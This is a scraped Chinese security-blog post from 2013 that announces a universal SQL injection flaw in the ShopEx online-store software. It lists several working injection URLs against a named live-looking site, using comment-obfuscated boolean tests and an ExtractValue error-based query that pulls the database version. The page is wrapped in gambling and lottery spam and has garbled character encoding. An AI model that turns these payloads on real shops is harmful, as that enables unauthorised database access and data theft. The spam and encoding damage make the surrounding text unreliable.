盈讯足球比分网|华体足球比分直播|
关注我们
QRcode ?#22987;?#32852;系 QRcode

网店系统shopex最新注入漏洞通杀

 feng 2013/02/04 21:47  2,454 ℃  1条点评

注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现?#21487;?#20102;,但不得不用到的一种攻击技术...

好吧,我?#23545;?#20102;~~

其实注入不仅仅出现在动态页面上,?#35757;牢本?#24577;后就不能注入了吗?NO~

不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:

http://www.aycelz.tw/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html
http://www.aycelz.tw/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/by/**/'1-ask-commentlist.html

http://www.aycelz.tw/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html
http://www.aycelz.tw/485/index.php?comment-190'/**/and/**/'1'='1-ask-commentlist.html

 

一个是网站未开启?#26412;?#24577;的注入,一个是网站开启?#26412;?#24577;后的注入,以及是否屏?#26410;?#35823;回显的2X2=4种情况。

如何注入就不多说了,10多年的东西了...不会的也该学会了...

本文标签:
服务器网站打包批量压缩php脚本
红黑联盟现场培训(脱产)第一期开始咯
Joy:一款用于捕获和分析网络内部流量数据的工具Joy:一款用于捕获和分析网络内部流量数据的工具One-Lin3r:懒人的福音,渗透测试单行化工具One-Lin3r:懒人的福音,渗透测试单行化工具EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具国产网站恶意代码监测(网马监控)工具优化版国产网站恶意代码监测(网马监控)工具优化版

已有1条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

  1. #1 I'm not 骇客

    求个友链啊 :razz: :razz: :razz:

    2013-02-05 下午 11:16回复


盈讯足球比分网
北京赛车pk10 疯狂天天捕鱼赢话费 快乐十分杀10码准确率99 全球股票指数stock pk10能赚钱吗 如何领取广西双色球的奖金 金百博线上娱乐 大圣捕鱼娱乐平台 模拟人生4 园艺赚钱 广东快乐十分走势图快朱乐十分